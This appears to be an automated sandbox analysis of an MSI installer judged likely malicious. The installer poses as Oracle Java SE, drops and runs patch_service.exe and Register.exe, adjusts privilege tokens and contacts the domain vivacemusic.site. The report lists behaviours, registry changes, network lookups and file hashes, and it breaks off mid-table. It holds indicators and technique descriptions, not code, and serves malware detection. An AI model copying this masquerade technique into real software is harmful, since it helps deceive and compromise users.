Analysis Overview
SHA256
7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5
Threat Level: Likely malicious
The file 1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Command and Scripting Interpreter: PowerShell
Modifies file permissions
Blocklisted process makes network request
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Enumerates connected drives
Drops file in Windows directory
Executes dropped EXE
Loads dropped DLL
Drops file in Program Files directory
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-07 11:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-07 11:25
Reported
2024-10-07 11:28
Platform
win7-20240903-en
Max time kernel
147s
Max time network
127s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\f778881.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f778882.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI94CD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI955A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{B787FD59-D138-4CB1-8AF7-72A4E4815245}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f778884.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f778881.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9904.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f778882.ipi | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\PackageCode = "0EBA20D468628E64F92B33D46217DF75" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductIcon = "C:\\Windows\\Installer\\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\PackageName = "1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\95DF787B831D1BC4A87F274A4E182554 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A7D9DB54E9B6F3B6630012FC7647155E
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D0B7C0D091818C344EFC99F4C0038533 M Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 2.22.249.67:80 | repository.certum.pl | tcp |
| N/A | 127.0.0.1:49427 | tcp | |
| US | 8.8.8.8:53 | vivacemusic.site | udp |
| N/A | 127.0.0.1:49430 | tcp | |
| N/A | 127.0.0.1:49433 | tcp | |
| N/A | 127.0.0.1:49435 | tcp | |
| N/A | 127.0.0.1:49438 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab84BC.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar851C.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F
| MD5 | d5e98140c51869fc462c8975620faa78 |
| SHA1 | 07e032e020b72c3f192f0628a2593a19a70f069e |
| SHA256 | 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e |
| SHA512 | 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F
| MD5 | cac3c37653b4da0e0bf825c4af1610dd |
| SHA1 | 7ed10a295822a9ca833bf0f4fe774f862bc13d02 |
| SHA256 | 4706b22b2c654e9cf7ebfb7acb0905097d17797042f1c8ac650af149fe31895e |
| SHA512 | 0b4716b0bcf7484745fb69ec6b6bafedd9cbb82d645af3701f2ca17f03c1e76cabdfefa7e84a3df3161b36c77996741e3e8c2c77b169ee4dd10ee47fe2e01b5d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | efa9512f93d3510e0a618b0bb8521f4d |
| SHA1 | 3dc78f8aed67b3378fd650afd1f2f95965018e5a |
| SHA256 | 832d55d9e43a89da771b08be5419a967ff5ed8d1ca5601ec5e89dfba04af6e27 |
| SHA512 | 3ea622ab40bb73beca8459614626f701c286624bb691c804dab18f458c4f6f2275fa452e447c3f340d3622e719a706fe029d17a5a0621675a77a5afff4f9409f |
C:\Windows\Installer\MSI955A.tmp
| MD5 | a3ae5d86ecf38db9427359ea37a5f646 |
| SHA1 | eb4cb5ff520717038adadcc5e1ef8f7c24b27a90 |
| SHA256 | c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74 |
| SHA512 | 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0 |
\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
| MD5 | 36b24a4deb93b2af6da9dba72eefaa5f |
| SHA1 | 8c55de3fa1269f4fdba9a5c701c5daad84d59f38 |
| SHA256 | d3370bb63c1908550c49601fcc664313809fcb68fdfdb81ef8129fe465a254d2 |
| SHA512 | 572355b5ab4fd349c71aaf66d5a1232e48ee697bb96b84b6656dc6b6c64f7c8098e00772e1b519805bb441159281ec5f90ff91a20ed17597704bf2492f8fff9d |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll
| MD5 | 9dda681b0406c3575e666f52cbde4f80 |
| SHA1 | 1951c5b2c689534cdc2fbfbc14abbf9600a66086 |
| SHA256 | 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3 |
| SHA512 | 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll
| MD5 | e008fbfdea1bf873f3d94d74c1cf7935 |
| SHA1 | 2a2af5e9084e7b55cdd5d01df342b02c1917573c |
| SHA256 | 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b |
| SHA512 | 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | fb0ca6cbfff46be87ad729a1c4fde138 |
